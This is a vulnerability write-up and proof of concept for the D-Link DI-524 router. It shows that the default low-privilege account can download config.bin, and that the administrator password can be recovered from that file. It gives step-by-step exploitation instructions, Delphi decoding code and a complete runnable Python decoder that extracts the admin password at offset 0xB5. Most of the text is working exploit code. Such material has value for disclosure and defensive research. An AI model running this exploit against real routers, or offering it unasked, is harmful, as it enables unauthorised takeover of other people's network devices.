As far as is known, all firmware versions of the DI-524 are affected by this vulnerability. A proof of concept (discovered by Stas'M) follows.
Only user-level rights are required to exploit it (the default user credentials are user with an empty password). The problem is that this low-privileged account is allowed to download the configuration backup, which contains the administrator password under a reversible obfuscation rather than real encryption.
Steps to exploit (assume the router is at 192.168.0.1):
1. Log in to the router at http://192.168.0.1/ with Username: user, Password: <empty>.
2. Download the file http://192.168.0.1/config.bin
3. Check the file signature. For the DI-524 the default signature is "DLB6031" at offset 0; if it is missing, the file is not a DI-524 backup and the decoder below does not apply.
4. Decode the file. The following function (Delphi 2010 code) decodes it; the configuration file must first be loaded into a TMemoryStream. The first 54 bytes are a header that is copied unchanged, the remainder is obfuscated and is undone in two passes (one forward, one backward from the end of the file).
  function DLB6031_Pass(var M: TMemoryStream): AnsiString;

    // Per-byte transform. Y is a stream position mod 16 (0..15). Note that
    // Dec(Y) on a Byte wraps 0 to 255, which then takes the "shl 7" branch;
    // Y = 1 becomes 0 and shifts the byte out entirely (result 0).
    function tbl(X, Y: Byte): Byte;
    begin
      Dec(Y);
      Result := not X;
      if Y < 8 then Result := Result shr (8 - Y);
      if Y > 8 then Result := Result shl (Y and 7);
    end;

  var
    O: TMemoryStream;
    I: Integer;
    B1, B2: Byte;
  begin
    Result := '';
    M.Seek(0, soFromBeginning);
    O := TMemoryStream.Create;
    try
      // The 54-byte header is copied as-is.
      I := 0;
      while I < 54 do
      begin
        M.ReadBuffer(B1, 1);
        O.WriteBuffer(B1, 1);
        Inc(I);
      end;
      // Forward pass: every remaining byte is transformed according to its
      // position. M.Position is one past the byte just read.
      while I < M.Size do
      begin
        M.ReadBuffer(B1, 1);
        B1 := tbl(B1, M.Position mod 16);
        O.WriteBuffer(B1, 1);
        Inc(I);
      end;
      // Backward pass: walk the input from the last byte down to offset 54
      // and add the transformed byte into the output from offset 54 upwards,
      // i.e. each output byte is combined with its mirror-image input byte.
      Dec(I);
      M.Seek(-1, soCurrent);
      O.Seek(54, soFromBeginning);
      while I > 53 do
      begin
        M.ReadBuffer(B1, 1);
        B1 := tbl(B1, 15 - (M.Position mod 16));
        M.Seek(-2, soCurrent);
        O.ReadBuffer(B2, 1);
        B1 := Byte(B1 + B2);   // addition modulo 256, independent of {$R+}
        O.Seek(-1, soCurrent);
        O.WriteBuffer(B1, 1);
        Dec(I);
      end;
      // The file is now decoded and can be saved:
      // O.SaveToFile('...');
      // The clear-text password is a NUL-terminated string at offset B5h.
      if O.Size >= $D5 then
        Result := PAnsiChar(Cardinal(O.Memory) + $B5);
    finally
      O.Free;
    end;
  end;
5. Exploit completed. We now have the administrator password, so we can log out, log on again as admin:<recovered password> and change any setting on the router.
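Steps 3 to 5 as a single offline script, added here as an example; it is a Python port of the Delphi proof of concept above, not code from the original write-up. It takes a config.bin that was already saved from the browser (steps 1 and 2), checks the DLB6031 signature, runs the two decoding passes and reads the NUL-terminated string at offset B5h. The 54-byte header length, the 0xB5 password offset and the 0xD5 minimum size are the values used by the Delphi code; the sample input at the bottom is constructed for illustration and is not a real DI-524 backup.

```python
"""Decoder for the D-Link DI-524 config.bin backup (port of the Delphi PoC).

Layout, as described in the write-up: a 54-byte header that is copied
verbatim, then an obfuscated region; the signature "DLB6031" sits at
offset 0 and the clear-text administrator password is a NUL-terminated
string at offset 0xB5 of the decoded image.
"""
import sys

SIGNATURE = b"DLB6031"
HEADER_LEN = 54          # bytes left untouched by the decoder
PASSWORD_OFFSET = 0xB5   # start of the NUL-terminated admin password
MIN_DECODED_SIZE = 0xD5  # the PoC only reads the password if the image is this long


def tbl(x: int, y: int) -> int:
    """Per-byte transform; y is a stream position mod 16 (0..15).

    Mirrors the Delphi helper exactly, including the Byte wrap-around of
    Dec(Y) for y == 0 (255 > 8, so the byte is shifted left by 7) and the
    y == 1 case, where the byte is shifted out completely (result 0).
    """
    y = (y - 1) & 0xFF
    r = (~x) & 0xFF              # `not X` on a Byte
    if y < 8:
        r >>= 8 - y
    elif y > 8:
        r = (r << (y & 7)) & 0xFF
    return r                     # y == 8: plain complement, no shift


def check_signature(data: bytes) -> bool:
    return data.startswith(SIGNATURE)


def decode(data: bytes) -> bytes:
    """Two passes over the obfuscated region, as in the Delphi PoC.

    Forward pass:  out[i] = tbl(in[i], (i + 1) % 16) for i >= 54.
    Backward pass: walk the input from the last byte down to offset 54 and
    add tbl(in[i], 15 - ((i + 1) % 16)) into the output from offset 54
    upwards, so each output byte is combined with its mirror-image input
    byte. The (i + 1) reflects that the Delphi stream position is one past
    the byte just read.
    """
    n = len(data)
    if n < HEADER_LEN:
        raise ValueError("file shorter than the 54-byte header")
    out = bytearray(data[:HEADER_LEN])
    for i in range(HEADER_LEN, n):
        out.append(tbl(data[i], (i + 1) % 16))
    for j, i in enumerate(range(n - 1, HEADER_LEN - 1, -1)):
        k = HEADER_LEN + j
        out[k] = (out[k] + tbl(data[i], 15 - ((i + 1) % 16))) & 0xFF
    return bytes(out)


def admin_password(decoded: bytes):
    """Return the string at 0xB5, or None if the image is too short.

    Unlike the PAnsiChar read in the PoC, the scan stops at the end of the
    buffer if no NUL terminator is found.
    """
    if len(decoded) < MIN_DECODED_SIZE:
        return None
    tail = decoded[PASSWORD_OFFSET:]
    end = tail.find(b"\x00")
    raw = tail if end < 0 else tail[:end]
    return raw.decode("latin-1")


def recover(data: bytes):
    """Signature check, decode and password extraction in one call."""
    if not check_signature(data):
        raise ValueError("not a DLB6031 config.bin")
    return admin_password(decode(data))


# Constructed sample (not a real backup): a valid header padded to 54 bytes
# followed by two payload bytes. decode() maps 00 FF at offsets 54..55 to
# 3F 7F: offset 54 = tbl(0x00, 7) + tbl(0xFF, 7) = 0x3F + 0x00, and
# offset 55 = tbl(0xFF, 8) + tbl(0x00, 8) = 0x00 + 0x7F.
SAMPLE_HEADER = SIGNATURE.ljust(HEADER_LEN, b"\x00")
SAMPLE = SAMPLE_HEADER + bytes([0x00, 0xFF])


def demo() -> bytes:
    return decode(SAMPLE)


if __name__ == "__main__":
    with open(sys.argv[1], "rb") as f:
        blob = f.read()
    pw = recover(blob)
    print("admin password:", repr(pw) if pw is not None else "<file too short>")
```

Run it as `python di524_decode.py config.bin` after saving config.bin from the browser. Because tbl throws bits away for most positions, the scheme cannot be re-encoded from the decoded image; the script is strictly a decoder, which is all the exploit needs.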